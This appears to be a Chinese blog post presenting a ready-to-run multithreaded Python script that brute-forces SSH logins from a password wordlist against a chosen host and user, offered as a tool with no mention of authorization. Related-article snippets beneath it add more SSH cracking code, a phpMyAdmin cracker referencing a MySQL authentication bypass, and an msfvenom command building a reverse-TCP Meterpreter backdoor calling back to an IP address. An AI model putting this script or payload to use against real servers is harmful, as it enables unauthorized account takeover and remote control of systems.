Python3小工具——暴力破解ssh

最新推荐文章于 2024-04-07 11:11:34 发布
最新推荐文章于 2024-04-07 11:11:34 发布
阅读量378 收藏 1
点赞数
文章标签: 小程序 python 开发语言

一、工具说明

利用pxssh库进行暴力破解ssh

二、演示一下的利用效果

三、代码+注释

from pexpect import pxssh
import argparse
import threading

maxConnetions = 5
connect_lock = threading.BoundedSemaphore(value=maxConnetions)

def connect(host, user, password):
    try:
        s = pxssh.pxssh()
        # 登录ssh测试
        s.login(host, user, password)
        print("[+] Password Found: {}".format(password))
    except pxssh.ExceptionPxssh as e:
        pass

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-H', dest='Host', help="like: 192.168.3.1")
    parser.add_argument('-F', dest='passwdFile', help="like: /root/pass.txt")
    parser.add_argument('-u', dest='user')
    args = parser.parse_args()
    host = args.Host
    passwdFile = args.passwdFile
    user = args.user

    with open(passwdFile, 'r') as f:
        for line in f.readlines():
            with connect_lock:
                password = line.strip('\n')
                print("[-] Testing: {}".format(password))
                # 起线程每个密码尝试登录一次
                t = threading.Thread(target=connect, args=(host, user, password))
                t.start()

if __name__ == '__main__':
    main()
是空空呀
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python爆破ssh
weixin_35752233的博客
12-30 363
Python 中爆破 SSH 密码通常是不被允许的,因为这种行为可能会对目标主机造成严重损害,并且还可能违反当地的法律法规。 如果你想研究 SSH 密码爆破的原理或者进行安全测试,你可以在拥有授权的情况下使用自己的主机进行测试,或者使用模拟环境进行测试。 如果你真的需要使用 Python 来爆破 SSH 密码,你可以使用模块 paramiko 来尝试连接 SSH 服务器,如果连接成功,就说明密...
python 实现ssh爆破
qq_35948609的博客
01-06 1896
import paramiko import argparse import sys def sshbrute(user,passw,host): # 设置 flag 为 0 ,在成功登录的时候再置为 1 flag = 0 try: # 使用 paramiko.SSHClient 创建 ssh 对象 ssh = paramiko.SSHClient() # 允许将信任的主机自动加入到host_allow 列表,此方法必须放在co.
python linux服务器ssh简单爆破(测试用户名密码)(连接ssh服务器)(测试登录ssh服务器)
最新发布
Dontla的博客
04-07 1190
这段代码的目的是通过SSH协议尝试连接到指定的服务器,使用提供的用户名和密码组合列表进行身份验证。它适用于需要验证多个凭据对有效性的场景,比如在你有一个用户名和密码列表,需要检查哪些能够成功登录到SSH服务器。注意,此代码实际上会对每个凭证组合尝试四次连接(每个组合两次尝试,循环两遍),这可能不是预期的行为(主要是因为手动登录的时候,错误三次将会提示重新尝试,担心这个,所以每个组合尝试登录两次)。使用列表推导式生成用户名和密码的所有可能组合,结果是一个包含元组的列表,每个元组包含一对用户名和密码。
通过python代码自定义ssh密码爆破
weixin_43225966的博客
04-22 1111
通过python代码自定义ssh密码爆破
ssh爆破python脚本
m0_73896875的博客
07-06 330
print(f"成功登录 - 主机名:{hostname},用户名:{username},密码:{password}")print(f"登录失败 - 主机名:{hostname},用户名:{username},密码:{password}")password_file = input("请输入密码文件的路径:")hostname = input("请输入目标主机名或IP地址:")print(f"SSH错误:{str(e)}")username = input("请输入用户名:")@Author :星之尘。
【脚本工具Python暴力破解ZIP文件
热门推荐
知不足而奋进,望远山而前行
09-14 2万+
【代码】【实用小脚本】Python暴力破解ZIP文件。
Python小游戏大全——40个
05-14
Python小游戏大全——40个,快来下载吧! Python小游戏大全——40个,快来下载吧! Python小游戏大全——40个,快来下载吧! Python小游戏大全——40个,快来下载吧! ...
暴力破解SSHPython源码
06-14
# ssh爆破工具 ## * 用途 基于字典文件破解ssh账号密码 ## * 依赖 pip install paramiko ## * 使用方法: Usage: sshBrute.py [options] host Options: -h, --help show this help message and exit -...
Python写的PHPMyAdmin暴力破解工具代码
12-25
PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。 #!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subprocess def Crack(url...
python辅助聊天工具——喷人
07-04
python辅助聊天工具——喷人
python小游戏大全——30个
05-31
python小游戏大全——30个,python小游戏大全——30个,快来下载吧!
3、安全开发-Python-协议库爆破&FTP&SSH&Redis&MYSQL&SMTP等
m0_65842464的博客
02-04 2035
原理:python的一些库支持FTP、SSH、Redis、SMTP、Mysql等协议远程登录,只需要知道该服务器ip和端口,然后用本机准备好的用户名字典和密码字典进行循环组合尝试爆破登录,其中字典的好坏决定成功的几率,可以尝试弱口令集和社工方式获取,当然也不一定能成功,这只是锄头,挖不挖的进取决于是什么地。
Python的简单实现:ssh综合密码爆破
NicolasZQ的博客
04-16 2121
一、项目地址 https://github.com/W01fh4cker/W01f-ssh-crack 二、代码思路 1. 首先导入库: 2. 定义函数getConfig(section, key),方便从data.conf中读取数据 3. 定义连接ssh的函数 这部分内容参考了刘江师傅的博客:用paramiko实现Python内的ssh功能 这部分代码写的很shi,繁琐得要命,其实无密码的情况下直接按回车就可以了,但是当天很晚才开始写,懒得改了。 插曲-发现问题 在参考刘江师傅的博客、其他人写
手把手教你用Python进行SSH暴力破解
pdcfighting的博客
08-31 2048
点击上方“Python爬虫与数据挖掘”,进行关注回复“书籍”即可获赠Python从入门到进阶共10本电子书今日鸡汤青冥浩荡不见底,日月照耀金银台。暴力破解属于密码破解的一种,也是最常见的...
SSH暴力破解
xigua2540的博客
06-12 2388
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.10.224 lport=4444 -f elf -o shell //后门名称是shell,反弹到192.168.10.224的4444端口。少部分攻击是针对 tomcat、postgres、 hadoop、 mysql、apache、ftpuser、vnc等Linux 服务器上常见应用程序使用的用户名。SSH基于用户名密码的身份验证,容易遭受密码暴力破解攻击;
Python安全渗透测试-SSH密码暴力破解渗透测试
旺仔Sec&blog
11-17 2087
第二步,使用ifconfig或ipconfig命令分别获取渗透机和靶机的IP地址,使用ping命令进行网络连通性测试,确保主机间网络的连通性;第三步,通过Python脚本语言自行开发渗透测试工具,实现判断SSH应用程序的版本信息,首先导入必要的Python模块。第七步,定义main函数执行的条件,确保main函数仅在模块__main__当中执行。第八步,执行脚本,如果存在root账号弱口令,则获取SSH服务器root账号登录密码。第五步,定义函数sshconn,该函数的作用为尝试连接SSH服务器。
服务器暴力破解的程序(python开发)
it_roseonly的博客
06-26 705
服务器暴力破解的程序(python开发)首先我们看一下基本的原理以及过程 我们首先看一下准备工作: 我们需要获取目标机器的IP和SHH端口 ssh端口是可以改变的,所以我们需要去扫描机器的正确的ssh端口。我们使用nmap工具去扫描,使用下面这条命令就可以目标机器上面存在的所有的端口以及服务的名称和使用软件的版本号:Nmap -v -p 1-65535 -sV -O -sS -T4 192.1
msfconsole暴力破解ssh
c2006111的博客
11-12 1329
第4步进入 auxiliary/scanner/ssh_login。ssh root@172.16.3.60再输入密码再点击回车键即可。第10步查看信息确认是否修改成功。第2步进入msfconsole。第3步启动ssh_login。第1步编辑名字字典,密码字典。第9步设置成功时停止。第7步 设置名字字典。
如何使用python暴力破解SHA——1
05-12
SHA-1 是一种加密算法,其设计目的就是为了防止暴力破解,因此暴力破解 SHA-1 是非常困难的。一般来说,暴力破解 SHA-1 的方法是使用字典攻击或彩虹表攻击。这里我们介绍一下使用 Python 实现字典攻击的方法: 1. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值